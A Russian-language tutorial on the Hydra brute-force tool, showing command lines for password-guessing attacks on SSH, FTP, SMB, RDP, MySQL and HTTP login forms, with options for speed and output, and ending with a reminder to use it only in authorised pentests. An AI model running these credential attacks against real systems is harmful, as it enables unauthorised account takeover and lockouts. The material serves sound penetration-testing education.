Hydra — один из самых известных инструментов для атак на аутентификацию сетевых сервисов. SSH, FTP, HTTP Basic Auth, RDP, SMB, MySQL, PostgreSQL, Telnet — Hydra поддерживает более 50 протоколов. При этом атака проводится параллельно, что даёт серьёзную скорость перебора.

Синтаксис и базовые примеры

Общий синтаксис:

hydra [опции] ЦЕЛЬ ПРОТОКОЛ [параметры]

Брутфорс SSH с одним пользователем и словарём паролей:

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

Если нужно перебирать и логины тоже:

hydra -L users.txt -P passwords.txt ssh://192.168.1.100

Одна пара логин:пароль (быстрая проверка):

hydra -l admin -p admin123 ssh://192.168.1.100

Атака на HTTP-форму

Это самый часто используемый и самый трудоёмкий в настройке сценарий. Нужно понять форму: метод (POST/GET), имена полей, признак неудачи.

hydra -l admin -P wordlist.txt 192.168.1.100 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

Здесь:

  • /login — путь к форме
  • username=^USER^&password=^PASS^ — тело POST, ^USER^ и ^PASS^ — плейсхолдеры
  • Invalid credentials — строка в ответе при неудаче (Hydra ищет её)

Популярные протоколы

FTP:

hydra -l ftp_user -P wordlist.txt ftp://192.168.1.100

SMB:

hydra -l administrator -P wordlist.txt smb://192.168.1.100

RDP:

hydra -l administrator -P wordlist.txt rdp://192.168.1.100

MySQL:

hydra -l root -P wordlist.txt mysql://192.168.1.100

Управление скоростью

-t — количество параллельных потоков (по умолчанию 16):

hydra -l admin -P wordlist.txt -t 32 ssh://192.168.1.100

-w — время ожидания ответа в секундах:

hydra -l admin -P wordlist.txt -t 4 -w 30 rdp://192.168.1.100

RDP и SMB чувствительны к количеству потоков — используйте -t 1..4 для стабильности.

Полезные опции

  • -V — verbose режим, показывать каждую попытку
  • -f — остановиться после первого найденного пароля
  • -o result.txt — сохранить успешные пары в файл
  • -e nsr — дополнительные попытки: n=нет пароля, s=логин как пароль, r=обратный логин
  • -s PORT — нестандартный порт

Пример с несколькими опциями:

hydra -l admin -P rockyou.txt -t 8 -f -V -o found.txt ssh://192.168.1.100

Восстановление после прерывания

Если атака прервалась — Hydra автоматически создаёт файл восстановления. Продолжить:

hydra -R

Важное замечание

Hydra — мощный инструмент, который генерирует много шума в логах. На реальных пентестах согласовывайте атаки на аутентификацию с заказчиком отдельно — блокировка аккаунтов и алерты SOC могут повлиять на ход проекта. Используйте только в авторизованных тестах.